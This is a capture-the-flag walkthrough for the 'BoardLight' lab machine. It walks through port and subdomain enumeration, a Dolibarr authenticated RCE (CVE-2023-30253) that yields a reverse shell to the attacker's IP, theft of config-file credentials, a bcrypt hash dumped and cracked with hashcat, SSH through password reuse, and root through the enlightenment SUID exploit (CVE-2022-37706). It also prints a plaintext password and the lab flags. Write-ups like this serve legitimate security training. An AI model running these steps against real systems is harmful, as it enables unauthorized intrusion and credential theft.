Board Light - Walkthrough

BoardLight is an easy difficulty Linux machine that features a Dolibarr instance vulnerable to CVE-2023-30253. This vulnerability is leveraged to gain access as www-data. After enumerating and dumping the web configuration file contents, plaintext credentials lead to SSH access to the machine. Enumerating the system, a SUID binary related to enlightenment is identified which is vulnerable to privilege escalation via CVE-2022-37706 and can be abused to leverage a root shell.

Enumeration

We begin with an Nmap scan to identify open services:

sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn --disable-arp-ping 10.10.11.11 -oG allPorts

The scan reveals:

PORT	STATE	SERVICE
22/tcp	open	ssh
80/tcp	open	http

A targeted scan provides more details:

sudo nmap -p22,80 -sCV 10.10.11.11 -oN targeted

SSH → OpenSSH 8.2p1 Ubuntu 4ubuntu0.11
HTTP → Apache httpd 2.4.41 (Ubuntu)

board.htb

We perform subdomain fuzzing:

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://board.htb -H "Host: FUZZ.board.htb" -fs 15949

Discovered subdomain: crm

We add the hostnames to /etc/hosts:

sudo sh -c 'echo "10.10.11.11 board.htb crm.board.htb" >> /etc/hosts'

crm.board.htb

The CRM subdomain runs Dolibarr ERP/CRM.

Foothold

Dolibarr 17.0.0 is vulnerable to authenticated RCE (CVE-2023-30253). Testing default credentials admin:admin successfully authenticates. We exploit it to gain a reverse shell:

git clone https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253
python3 exploit.py http://crm.board.htb admin admin 10.10.14.10 5000

Shell obtained as www-data.

Post-Exploitation

We search for credentials in the Dolibarr configuration:

grep -ril "pass" /var/www/html/crm.board.htb | grep "conf"
cat /var/www/html/crm.board.htb/htdocs/conf/conf.php

Database credentials found:

Username	Password
dolibarrowner	serverfun2$2023!!

We connect to MySQL and extract user hashes:

mysql -u dolibarrowner -p dolibarr

SELECT login, pass_crypted FROM llx_user;

| login    | pass_crypted                                                 |
| admin    | $2y$10$gIEKOl7VZnr5KLbBDzGbL.YuJxwz5Sdl5ji3SEuiUSlULgAhhjH96 |

We crack the bcrypt hash with hashcat:

hashcat -m 3200 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

The hash cracks to admin, but we notice the database password is reused. Testing it with the local user larissa:

Username	Password
larissa	serverfun2$2023!!

We SSH as larissa and capture the user flag:

ssh [email protected]
cat user.txt

User flag: d3d52a4b2e7795a1a492352042889565

Privilege Escalation

We search for SUID binaries:

find / -perm -4000 2>/dev/null

The enlightenment binary is present and vulnerable to CVE-2022-37706. We exploit it:

git clone https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit
chmod +x poc.sh
./poc.sh

[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)

Root shell obtained:

cat /root/root.txt

Root flag: 0874c2c63ac85bd4f81c12dc8748de78